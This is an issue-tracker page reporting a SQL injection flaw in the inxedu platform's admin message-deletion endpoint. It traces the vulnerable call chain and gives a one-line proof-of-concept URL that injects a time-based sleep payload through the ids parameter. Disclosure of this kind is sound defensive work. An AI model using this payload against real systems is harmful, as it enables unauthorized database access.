660 Star 1.6K Fork 835

因酷 / inxedu

 / 详情

sqlinjection3

待办的
创建于  
2020-12-12 11:44
  1. Vulnerability analysis
    the vulnerability code location:
    com/inxedu/os/edu/controller/letter/AdminMsgSystemController.java#delsystemmsg

输入图片说明
it calls:
com/inxedu/os/edu/service/impl/letter/MsgSystemServiceImpl.java

输入图片说明
com/inxedu/os/edu/dao/impl/letter/MsgSystemDaoImpl.java
输入图片说明
inxedu use Mybatis, the logic is in mybatis/inxedu/letter/MsgSystemMapper.xml
输入图片说明
2. POC
http://127.0.0.1:8080/admin/letter/delsystem/?ids=1,(select*from(select(sleep(5)))a)
输入图片说明
输入图片说明

评论 (0)

fly 创建了任务
fly 关联仓库设置为因酷/inxedu
fly 修改了描述
展开全部操作日志

登录 后才可以发表评论

状态
负责人
里程碑
Pull Requests
关联的 Pull Requests 被合并后可能会关闭此 issue
分支
开始日期   -   截止日期
-
置顶选项
优先级
参与者(1)
Java
1
https://gitee.com/inxeduopen/inxedu.git
git@gitee.com:inxeduopen/inxedu.git
inxeduopen
inxedu
inxedu

搜索帮助

14c37bed 8189591 565d56ea 8189591